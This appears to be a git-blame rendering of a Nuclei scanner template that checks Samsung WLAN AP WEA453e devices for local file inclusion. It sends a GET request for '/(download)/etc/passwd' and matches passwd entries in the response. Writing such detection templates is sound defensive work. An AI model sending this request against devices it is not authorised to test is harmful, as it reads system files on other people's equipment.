2021-02-15 04:30:32 +00:00
|
|
|
id: samsung-wlan-ap-lfi
|
|
|
|
|
|
|
|
info:
|
2022-06-03 19:12:31 +00:00
|
|
|
name: Samsung WLAN AP WEA453e - Local File Inclusion
|
2021-02-15 04:30:32 +00:00
|
|
|
author: pikpikcu
|
2022-06-03 19:12:31 +00:00
|
|
|
severity: high
|
|
|
|
description: Samsung WLAN AP WEA453e is susceptible to local file inclusion vulnerabilities.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
2022-06-03 19:12:31 +00:00
|
|
|
- https://omriinbar.medium.com/samsung-wlan-ap-wea453e-vulnerabilities-7aa4a57d4dba
|
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
|
|
|
cvss-score: 8.6
|
|
|
|
cwe-id: CWE-22
|
2021-02-15 15:59:12 +00:00
|
|
|
tags: xss,samsung,lfi
|
2021-02-15 04:30:32 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/(download)/etc/passwd"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
regex:
|
2022-03-22 08:01:31 +00:00
|
|
|
- "root:.*:0:0:"
|
2021-07-24 21:35:55 +00:00
|
|
|
- "bin:.*:1:1"
|
2021-02-15 04:30:32 +00:00
|
|
|
part: body
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2022-06-03 19:12:31 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/05/31
|